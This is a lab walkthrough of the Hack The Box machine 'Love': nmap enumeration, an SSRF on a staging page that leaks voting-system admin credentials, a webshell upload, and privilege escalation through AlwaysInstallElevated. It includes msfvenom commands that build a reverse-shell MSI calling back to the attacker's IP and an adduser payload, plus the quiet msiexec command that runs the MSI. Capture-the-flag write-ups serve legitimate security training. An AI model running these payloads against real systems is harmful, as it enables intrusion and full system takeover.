Love

Posted on Aug 7, 2021

HTB - Love

Enumeration

NMAP

└─$ sudo nmap -sC -sV 10.10.10.239                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 06:28 EDT                                                                                                                                                                              
Nmap scan report for 10.10.10.239                                                                                                                                                                                                            
Host is up (0.076s latency).                                                                                                                                                                                                                 
Not shown: 993 closed ports                                                                                                                                                                                                                  
PORT     STATE SERVICE      VERSION                                                                                                                                                                                                          
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   LDAPSearchReq, SMBProgNeg, X11Probe, afp: 
|_    Host '10.10.16.65' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=5/10%Time=60990AD1%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Pro
SF:be,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchRe
SF:q,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(afp,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h41m28s, deviation: 4h02m30s, median: 21m27s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-10T03:50:08-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-10T10:50:07
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.52 seconds

HTTP

Certificate gives hints about the domain and a user.

![[Pasted image 20210510123206.png]]

http://love.htb/

Shows “Voting System using PHP”.

Exploring http://staging.love.htb/ there is a page beta.php which lets the user enter an URL which will fetch a file and “scan” it.

We try this out

![[Pasted image 20210511150356.png]]

![[Pasted image 20210511150410.png]]

We are not able to reach https://10.10.10.239:5000/.

![[Pasted image 20210511150615.png]]

If we enter this in the filescanner we get some creds to the Voting System.

![[Pasted image 20210511150652.png]]

Vote Admin Creds admin: @LoveIsInTheAir!!!! admin:@LoveIsInTheAir!!!!

User and foothold

With the credentials, we should be able to exploit this.

This recent exploit seems to be applicable in this case.

Uploading the webshell and triggering it will give us user.

![[Pasted image 20210512120233.png]]

Root

Privilege Escalation

Running winpeas we observe that AlwaysInstallElevated is on

Which we can confirm

![[Pasted image 20210512131952.png]]

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

We follow the [steps](msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format)

  1. Create the payload msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi lhost=10.10.16.65 lport=9005 -o bad.msi
  2. Execute the payload on victim msiexec /quiet /qn /i C:\Users\Phoebe\Desktop\bad.msi
  3. Profit ![[Pasted image 20210512133954.png]]